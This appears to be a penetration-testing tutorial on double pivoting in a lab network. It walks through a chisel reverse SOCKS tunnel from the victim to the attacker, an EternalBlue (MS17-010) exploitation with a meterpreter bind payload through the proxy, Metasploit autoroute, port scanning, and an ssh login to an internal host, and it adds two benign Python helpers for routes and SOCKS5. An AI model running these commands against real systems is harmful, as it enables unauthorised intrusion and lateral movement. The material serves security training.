Pivoting

Chisel

To open a SOCKS tunnel we use chisel. On the attacking machine we start the chisel server with the command below. The --reverse flag is what allows the client to open a listener on the server side; as written the server accepts any client that can reach port 8000, so on a shared network add --auth user:pass on the server (and pin the server key with --fingerprint on the client).

chisel server -p 8000 --reverse

On the victim machine we copy chisel over (for Windows, use the chisel.exe from the official repository) and run the client against the attacker's IP:

chisel.exe client 192.168.18.41:8000 R:socks

With R:socks the server side opens a SOCKS5 listener on 127.0.0.1:1080 of the attacking machine; connections made to it leave the network from the victim. We point proxychains at it in /etc/proxychains.conf:

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4         127.0.0.1 9050
socks5  127.0.0.1       1080

Then we can run tools through proxychains, for example against a host on the victim's second network:

proxychains curl 192.168.172.130

Doble Pivote con Metasploit

We start by finding the Windows host on the second network, 192.168.172.143, and check whether it is vulnerable to EternalBlue (MS17-010) with the scanner module:

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       192.168.172.143                                                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

Run as-is, the scanner reports nothing useful: msfconsole does not go through proxychains, so the module itself has to be told to use the SOCKS socket.

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[*] 169.254.106.25:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We add it with the PROXIES option:

set PROXIES SOCKS5:127.0.0.1:1080

With the proxy set, the scan reaches the host and reports it as vulnerable:

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.172.143:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)
[*] 192.168.172.143:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Next we switch to the EternalBlue exploit module (index 2 in the earlier search results):

msf6 auxiliary(scanner/smb/smb_ms17_010) > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

We choose a bind payload: the target cannot reach our IP, so a reverse_tcp stage would never connect back, whereas a bind_tcp listener on the target is reachable from our side through the SOCKS proxy.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp

Then we set the target address (in msf6 RHOST is an alias for RHOSTS, so either line alone is enough):

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.172.143
RHOSTS => 192.168.172.143
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.172.143
RHOST => 192.168.172.143

The PROXIES option belongs to the module, so it is cleared when we change modules with use; we set it again (setg PROXIES ... would make it global for the whole msfconsole session instead):

set PROXIES SOCKS5:127.0.0.1:1080

We run the exploit to get the shell. Note the session line: it is opened via 127.0.0.1:1080, i.e. through the proxy.

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] 192.168.172.143:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.172.143:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.172.143:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)
[*] 192.168.172.143:445   - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.172.143:445 - The target is vulnerable.
[*] 192.168.172.143:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.172.143:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)
[*] 192.168.172.143:445   - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.172.143:445 - Connecting to target for exploitation.
[+] 192.168.172.143:445 - Connection established for exploitation.
[+] 192.168.172.143:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.172.143:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.172.143:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.172.143:445 - 0x00000010  61 73 69 63 20 37 36 30 30                       asic 7600       
[+] 192.168.172.143:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.172.143:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.172.143:445 - Sending all but last fragment of exploit packet
[*] 192.168.172.143:445 - Starting non-paged pool grooming
[+] 192.168.172.143:445 - Sending SMBv2 buffers
[+] 192.168.172.143:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.172.143:445 - Sending final SMBv2 buffers.
[*] 192.168.172.143:445 - Sending last fragment of exploit packet!
[*] 192.168.172.143:445 - Receiving response from exploit packet
[+] 192.168.172.143:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.172.143:445 - Sending egg to corrupted connection.
[*] 192.168.172.143:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 192.168.172.143:4444
[*] Sending stage (200262 bytes) to 192.168.172.143
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 127.0.0.1:1080) at 2022-01-03 12:15:13 -0800
[+] 192.168.172.143:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.172.143:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.172.143:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Now we run ipconfig in meterpreter to see which networks the host sits on:

Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:f2:5c:18
MTU          : 1500
IPv4 Address : 192.168.172.143
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::887:d7b7:f6cf:2199
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 17
============
Name         : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:f2:5c:22
MTU          : 1500
IPv4 Address : 169.254.106.25
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::394a:efca:78d8:6a19
IPv6 Netmask : ffff:ffff:ffff:ffff::

The second interface is on 169.254.106.0, which we cannot reach from the attacker, so we add a route to it through the session with autoroute. Note that the module's default NETMASK is 255.255.255.0 while the interface's mask is 255.255.0.0; the /24 is enough for this lab, but a host elsewhere in the /16 would not be routed (CMD autoadd takes the masks from the session's interfaces instead).

meterpreter > background
[*] Backgrounding session 1...

msf6 exploit(windows/smb/ms17_010_eternalblue) > search autoroute

Matching Modules
================

   #  Name                         Disclosure Date  Rank    Check  Description
   -  ----                         ---------------  ----    -----  -----------
   0  post/multi/manage/autoroute                   normal  No     Multi Manage Network Route via Meterpreter Session


Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/autoroute

msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 169.254.106.0
SUBNET => 169.254.106.0
msf6 post(multi/manage/autoroute) > set CMD add
CMD => add
msf6 post(multi/manage/autoroute) > run

[!] SESSION may not be compatible with this module.
[*] Running module against TEST
[*] Adding a route to 169.254.106.0/255.255.255.0...
[+] Route added to subnet 169.254.106.0/255.255.255.0.
[*] Post module execution completed
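As an added example (not code from the page or from Metasploit), the following Python parses a meterpreter ipconfig listing like the one above, derives each directly connected network from its address and netmask, and prints the equivalent route add commands. It makes the netmask point concrete: the route 169.254.106.0/255.255.255.0 used above covers 169.254.106.26 but not the rest of the 169.254.0.0/16 the interface is actually on. The sample listing is the page's own output embedded as a constructed string; the already_reachable parameter is this example's own, used to skip the 192.168.172.0/24 that chisel already reaches.

```python
"""Plan Metasploit pivot routes from a meterpreter `ipconfig` dump.

Added example, not from the page or from Metasploit. Each interface's
network is computed from address + netmask with the stdlib ipaddress
module, then turned into a msfconsole `route add <net> <mask> <session>`.
"""
import ipaddress
import re

# Constructed sample input: the two interfaces reported by the page's session.
IPCONFIG_OUTPUT = """\
Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:f2:5c:18
MTU          : 1500
IPv4 Address : 192.168.172.143
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::887:d7b7:f6cf:2199
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 17
============
Name         : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:f2:5c:22
MTU          : 1500
IPv4 Address : 169.254.106.25
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::394a:efca:78d8:6a19
IPv6 Netmask : ffff:ffff:ffff:ffff::
"""


def parse_ipconfig(text):
    """Return [(interface_id, IPv4Interface)] for every block with an IPv4 address."""
    results = []
    for block in re.split(r"\n(?=Interface \d+)", text.strip()):
        m_id = re.match(r"Interface (\d+)", block)
        m_addr = re.search(r"IPv4 Address\s*:\s*(\S+)", block)
        m_mask = re.search(r"IPv4 Netmask\s*:\s*(\S+)", block)
        if m_id and m_addr and m_mask:
            # IPv4Interface accepts a dotted netmask after the slash.
            iface = ipaddress.IPv4Interface(f"{m_addr.group(1)}/{m_mask.group(1)}")
            results.append((int(m_id.group(1)), iface))
    return results


def plan_routes(text, session, already_reachable=()):
    """Build the msfconsole `route add <net> <mask> <session>` lines.

    Networks in already_reachable (hypothetical parameter: e.g. the /24 the
    attacker already reaches through chisel) are skipped, since sending them
    through the session would only add a hop.
    """
    skip = {ipaddress.IPv4Network(n) for n in already_reachable}
    cmds = []
    for _, iface in parse_ipconfig(text):
        net = iface.network
        if net in skip:
            continue
        cmds.append(f"route add {net.network_address} {net.netmask} {session}")
    return cmds


def route_covers(network, mask, target):
    """True if `target` would match a route entered as network/mask."""
    return ipaddress.IPv4Address(target) in ipaddress.IPv4Network(f"{network}/{mask}")


def is_link_local(addr):
    """169.254.0.0/16 is APIPA/link-local: the /16 route is the honest size,
    but addresses there are usually self-assigned, so expect few live hosts."""
    return ipaddress.IPv4Address(addr).is_link_local


if __name__ == "__main__":
    for cmd in plan_routes(IPCONFIG_OUTPUT, 1, already_reachable=["192.168.172.0/24"]):
        print(cmd)
    # The /24 route from the page misses hosts elsewhere in the interface's /16:
    print(route_covers("169.254.106.0", "255.255.255.0", "169.254.106.26"))
    print(route_covers("169.254.106.0", "255.255.255.0", "169.254.7.9"))
```

Paste the printed route add line into msfconsole (or use route print afterwards to confirm) and the session will carry the whole /16 rather than the single /24.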

With the route in place, Metasploit's own scanners can use it. We scan port 22 across the subnet to find hosts running SSH:

msf6 post(multi/manage/autoroute) > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   3  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   4  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   7  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/sap/sap_router_portscanner

msf6 post(multi/manage/autoroute) > use 5
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 169.254.106.0/24
RHOSTS => 169.254.106.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 22
PORTS => 22
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 40
THREADS => 40
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 169.254.106.26:       - 169.254.106.26:22 - TCP OPEN
[*] 169.254.106.0/24:     - Scanned  38 of 256 hosts (14% complete)
[*] 169.254.106.0/24:     - Scanned  68 of 256 hosts (26% complete)
[*] 169.254.106.0/24:     - Scanned  80 of 256 hosts (31% complete)
[*] 169.254.106.0/24:     - Scanned 113 of 256 hosts (44% complete)
[*] 169.254.106.0/24:     - Scanned 129 of 256 hosts (50% complete)
[*] 169.254.106.0/24:     - Scanned 160 of 256 hosts (62% complete)
[*] 169.254.106.0/24:     - Scanned 183 of 256 hosts (71% complete)
[*] 169.254.106.0/24:     - Scanned 205 of 256 hosts (80% complete)
[*] 169.254.106.0/24:     - Scanned 238 of 256 hosts (92% complete)
[*] 169.254.106.0/24:     - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Tools outside Metasploit cannot use that route, so we start a SOCKS proxy inside msfconsole that hands its connections to the route; that lets us ssh to the host we found:

msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks_proxy 
msf6 auxiliary(server/socks_proxy) > show options

Module options (auxiliary/server/socks_proxy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST   0.0.0.0          yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener
   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server


msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
SRVPORT => 9050
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) > 
[*] Starting the SOCKS proxy server

Now we point proxychains at the new socket on 9050 (the module listens on 0.0.0.0 with no credentials by default; set SRVHOST 127.0.0.1, or USERNAME and PASSWORD, if other hosts can reach the attacking machine):

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4         127.0.0.1 9050
socks5  127.0.0.1       9050

Finally we connect through proxychains; the S-chain line confirms the hop via 127.0.0.1:9050 to 169.254.106.26:22:

proxychains ssh leonardosd@169.254.106.26
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-169.254.106.26:22-<><>-OK
leonardosd@169.254.106.26's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.11.0-43-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

152 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Mon Jan  3 11:24:26 2022 from 169.254.106.25
leonardosd@ubuntu:~$ 
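Both the chisel section and this final ssh test rely on proxychains to confirm that the SOCKS pivot works. As an added example (not code from the page, chisel or Metasploit), here is the same SOCKS5 exchange done by hand in Python: the client half sends the greeting and the CONNECT request and reads the proxy's reply code, which is what tells you whether the pivot host could actually reach the target; the FakeSocks5Server half is a constructed stand-in for the pivot so the exchange runs offline, with 169.254.106.26:22 marked reachable and everything else answered with host unreachable. Against a real pivot you would call socks5_connect(("127.0.0.1", 1080), ("169.254.106.26", 22)) and skip the fake server; the hostname ubuntu.local is an assumption used only to exercise the domain-name address type.

```python
"""SOCKS5 (RFC 1928) CONNECT by hand. Added example, not from the page or its tools."""
import socket
import struct
import threading

REPLY_TEXT = {
    0x00: "succeeded",
    0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset",
    0x03: "network unreachable",
    0x04: "host unreachable",
    0x05: "connection refused",
    0x06: "TTL expired",
    0x07: "command not supported",
    0x08: "address type not supported",
}

def recv_exact(sock, n):
    """Read exactly n bytes or raise; SOCKS fields are fixed-size, so never guess."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection mid-handshake")
        buf += chunk
    return buf

def build_connect_request(host, port):
    """VER=5 CMD=1(CONNECT) RSV=0 ATYP ADDR PORT. Dotted IPv4 goes as ATYP=1;
    anything else as ATYP=3 (domain name) so the pivot resolves it, like
    proxychains' proxy_dns."""
    try:
        addr = b"\x01" + socket.inet_aton(host)
    except OSError:
        name = host.encode()
        addr = b"\x03" + bytes([len(name)]) + name
    return b"\x05\x01\x00" + addr + struct.pack("!H", port)

def parse_reply(head):
    """Decode the 4-byte reply header (VER REP RSV ATYP) into (code, text)."""
    if len(head) < 4 or head[0] != 0x05:
        raise ValueError("not a SOCKS5 reply: %r" % head)
    code = head[1]
    return code, REPLY_TEXT.get(code, "unknown reply 0x%02x" % code)

def socks5_connect(proxy, target, timeout=5.0):
    """Greeting + CONNECT through proxy=(host, port) to target=(host, port).
    Returns (code, text, sock); sock is usable only when code == 0."""
    s = socket.create_connection(proxy, timeout=timeout)
    s.sendall(b"\x05\x01\x00")                    # offer one method: no auth
    if recv_exact(s, 2) != b"\x05\x00":
        s.close()
        raise RuntimeError("proxy did not accept the no-auth method")
    s.sendall(build_connect_request(*target))
    head = recv_exact(s, 4)
    atyp = head[3]                                # drain BND.ADDR + BND.PORT
    if atyp in (1, 4):
        recv_exact(s, {1: 4, 4: 16}[atyp] + 2)
    elif atyp == 3:
        recv_exact(s, recv_exact(s, 1)[0] + 2)
    code, text = parse_reply(head)
    if code != 0:
        s.close()
        return code, text, None
    return code, text, s

class FakeSocks5Server(threading.Thread):
    """Constructed stand-in for the pivot host: answers each CONNECT with the code
    in `table` for that destination (default 0x04, host unreachable), relays nothing."""
    def __init__(self, table):
        super().__init__(daemon=True)
        self.table = table
        self.srv = socket.socket()
        self.srv.bind(("127.0.0.1", 0))           # loopback only, random port
        self.srv.listen(5)
        self.port = self.srv.getsockname()[1]

    def run(self):
        while True:
            conn, _ = self.srv.accept()
            with conn:
                nmethods = recv_exact(conn, 2)[1]  # VER, NMETHODS
                recv_exact(conn, nmethods)
                conn.sendall(b"\x05\x00")          # select no-auth
                req = recv_exact(conn, 4)
                if req[3] == 1:
                    host = socket.inet_ntoa(recv_exact(conn, 4))
                elif req[3] == 3:
                    host = recv_exact(conn, recv_exact(conn, 1)[0]).decode()
                else:
                    host = None
                port = struct.unpack("!H", recv_exact(conn, 2))[0]
                code = self.table.get((host, port), 0x04)
                conn.sendall(b"\x05" + bytes([code]) + b"\x00\x01" + b"\x00" * 6)

def demo():
    """Run the exchange against the fake pivot; returns {target: (code, text)}."""
    fake = FakeSocks5Server({("169.254.106.26", 22): 0x00})
    fake.start()
    results = {}
    for target in [("169.254.106.26", 22), ("169.254.7.9", 22), ("ubuntu.local", 22)]:
        code, text, sock = socks5_connect(("127.0.0.1", fake.port), target)
        if sock:
            sock.close()
        results[target] = (code, text)
    return results
```

Calling demo() returns succeeded for 169.254.106.26:22 and host unreachable for the other two; against the real pivot, a non-zero code for a host you expect to be reachable means the problem is on the pivot side (no route, wrong netmask, or the SOCKS listener bound to a session that is gone), not in proxychains.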
